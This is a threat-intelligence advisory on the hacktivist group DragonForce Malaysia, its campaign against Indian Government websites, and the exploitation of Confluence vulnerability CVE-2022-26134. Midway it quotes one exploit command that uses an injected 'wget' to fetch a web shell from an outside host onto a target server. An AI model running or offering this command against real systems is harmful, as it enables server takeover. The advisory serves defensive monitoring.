|Category: Adversary Intelligence||Threat Type: Latest Attack||Motivation: Hacktivist||Region: India||Source*: D4|
- On 21 June 2022, a threat actor published a post on a cybercrime forum, mentioning a PoC (Proof of Concept) for the exploit along with the Shodan dork for Confluence Server vulnerabilities targeted towards the Indian region.
- The actor also shared a GitHub repository containing the script which can be downloaded and exploited using the following python command:
|CVE-2022-26134.py http://targets.com “wget https://site.com/shell.txt -O DFM.php|
- Later that day, DragonForce Malaysia was seen sharing this exploit to all of their 152,257 subscribers on their Telegram channel.
- A significant amount of chatter was also observed on multiple cybercrime forums and Telegram channels regarding this Confluence vulnerability.
- On 10 June 2022, CloudSEK’s contextual AI digital risk platform XVigil discovered a Tweet posted by a Malaysian hacktivist group going by the name DragonForce, calling for attacks on Indian Government websites by Muslim hackers all around the world.
- The group’s primary objective of the attack, as claimed by them, was to get back at the Indian Government for controversial comments on Prophet Muhammad by some Indian politicians.
- The group behind this cyber call to arms, DragonForce Malaysia, is a pro-Palestinian hacktivist group based in Malaysia.
- This group owns and operates a forum where they post announcements and discuss their latest activities.
- The group also has Instagram and Facebook pages along with multiple Telegram channels. However, most content is replicated across their website and social media handles.
- The group has been conducting regular recruitment and promotion campaigns using Tiktok and Instagram reels.
- Based on the information from the open web, CloudSEK researchers could identify that as of 4 June 2022 at least 23 unique IPs were exploiting this vulnerability.
- A Shodan search showed that there are at least 9,396 publicly reachable instances of Confluence on the internet.
- The data from Cloudflare indicates that this vulnerability is being exploited by multiple sources on a large scale.